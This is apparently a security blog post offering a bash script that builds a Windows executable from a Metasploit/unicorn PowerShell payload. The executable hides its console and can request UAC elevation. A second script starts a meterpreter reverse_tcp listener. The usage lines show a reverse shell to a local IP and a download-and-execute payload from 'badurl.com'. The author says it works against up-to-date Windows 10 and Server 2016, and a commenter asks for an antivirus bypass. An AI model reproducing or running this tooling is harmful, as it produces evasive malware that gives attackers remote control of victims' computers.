Unicorn2C generator

Looking back, it has been 4 years since the excellent unicorn.py was written by Dave Kennedy https://github.com/trustedsec/unicorn

4 years ago I have also written my lame C source code generator for this https://astr0baby.wordpress.com/2013/06/20/unicorn-2-c-source-generator/

Decided to rewrite it and include the mingw64 compilation command sequence to spit out nice and shiny Windows PE32 executables. Save this shell script to a directory where you have metasploit-framework (especially msfvenom) as unicorn2.sh and make it executable. It will download the latest unicorn.py code from trustedsec github, patch a small part to load msfvenom from its current path, produce a C code and compile it via mingw64 (make sure you have a proper mingw installed – this was done on Linux Mint 18.2 x86_64) The required platforms are nonuac and uac (nonuac wont try to elevate but you won’t be able to get NT AUTHORITY/SYSTEM)

#!/bin/bash
clear
echo '-------------------------------------------------------------------------'
echo ' Unicorn.py is available @ https://github.com/trustedsec/unicorn '
echo ' Created by @HackingDave from trustedsec ' 
echo ' Lame Unicorn Powershell2C code generator made by Astr0 '
echo ' '
echo ' Make sure you have i686-w64-mingw32-gcc cross-compiler or similar '
echo '-------------------------------------------------------------------------'

echo '[*] Getting the unirorn.py code...'
wget -q -N "https://raw.githubusercontent.com/trustedsec/unicorn/master/unicorn.py" 
if [ -f ./unicorn.py ]; then
echo '[*] unicorn.py downloaded' 
echo '[*] cleaning up previous builds'
rm -f unicorn.exe
rm -f unicorn-uac.exe
ls -la unicorn.py
else
 echo '[-] Something went wrong during download .. '
exit 0
fi

echo "[*] Patching unicorn.py"
sed -i 's/msfvenom/.\/msfvenom/g' unicorn.py
echo ""
echo "" 
if [ -z "$*" ];then 
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform' 
echo 'Usage: unicorn2c.sh payload exename exeurl platform' 
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 uac' 
echo 'Example: unixorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe nonuac' 
echo 'Example: unixorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe uac' 
echo 'Valid platforms are: nonuac uac' 
exit 0 
fi
case $4 in 
nonuac)
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path.....good'
else
 echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi 
echo 'Generating nonUAC unicorn.c ...' 
python unicorn.py $1 $2 $3 > /dev/null 2>&1 
echo '#include <stdio.h>' > unicorn.c 
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c 
echo '#include <aclapi.h>' >> unicorn.c 
echo '#include <shlobj.h>' >> unicorn.c 
echo '#include <windows.h>' >> unicorn.c 
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c 
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c 
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c 
echo 'FreeConsole();' >> unicorn.c 
echo -n 'ShellExecute( NULL,NULL, "powershell.exe","-w 1 -C ' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{20}//' >> unicorn.c
echo -n ', NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c 
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c 
echo '[*] Exported unicorn.c'
echo '[*] Compiling unicorn.c'
i686-w64-mingw32-gcc unicorn.c -o unicorn.exe -lws2_32 -mwindows > /dev/null 2>&1
if [ -x ./unicorn.exe ]; then
echo '[*] unicorn.exe compiled'
ls -la unicorn.exe
else
 echo '[-] Something went wrong during compilation .. '
exit 0
fi

;;

uac)
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path.....good'
else
 echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi
echo 'Generating UAC unicorn.c ...'
python unicorn.py $1 $2 $3 > /dev/null 2>&1
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c
echo -n ' ShellExecute( NULL, "runas", "powershell.exe","-w 1 -C ' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{20}//' >> unicorn.c
echo -n ',NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
echo '[*] Exported unicorn.c'
echo '[*] Compiling unicorn.c'
i686-w64-mingw32-gcc unicorn.c -o unicorn-uac.exe -lws2_32 -mwindows > /dev/null 2>&1
if [ -x ./unicorn-uac.exe ]; then
echo '[*] unicorn-uac.exe compiled'
ls -la unicorn-uac.exe
else
 echo '[-] Something went wrong during compilation .. '
exit 0
fi
;;

"")
echo '[-] Wrong argument ! ' 
echo '' 
echo '[i] Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo '[i] Usage: unicorn2c.sh payload exename exeurl platform'
echo '[i] Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo '[i] Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 uac'
echo '[i] Example: unixorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe nonuac'
echo '[i] Example: unixorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe uac'
echo '[i] Valid platforms are: nonuac uac'
;;

*) 
echo '[-] Wrong argument ! ' 
echo ''
echo '[i] Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo '[i] Usage: unicorn2c.sh payload exename exeurl platform'
echo '[i] Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo '[i] Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 uac'
echo '[i] Example: unixorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe nonuac'
echo '[i] Example: unixorn2c.sh windows/download_exec exe=test.exe url=http://badurl.com/payload.exe uac'
echo '[i] Valid platforms are: nonuac uac'

exit 0 
;;
esac

And the metasploit listener code here ->  (Note that if you wish to use windows/download_exec you need to change it correspondingly below)

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

 

Works well against up2date Windows10

As well as up2date Windows Server 2016

 

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

4 Responses to Unicorn2C generator

  1. zimmaro says:

    ALL Always many thanks!!!i’don’t KNOW … for MY”kali” i’ve correct line(around) 63 && 104 ES:
    echo -n ‘ ShellExecute( NULL, “runas”, “powershell.exe”,”-w……….
    IN:
    echo -n ‘ ShellExecute( NULL, “runas”, “powershell.exe”,”‘ ‘ >>……
    USING “old writing “unicorn2c.sh …method! && worked fine!!!
    thanks again & sorry my english!! && with your permission…waiting for bypass New Eset…

  2. zimmaro says:

    thanks for reply !yes don’t “”work””in kali-linux at first-time…after correction working fine thanks

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s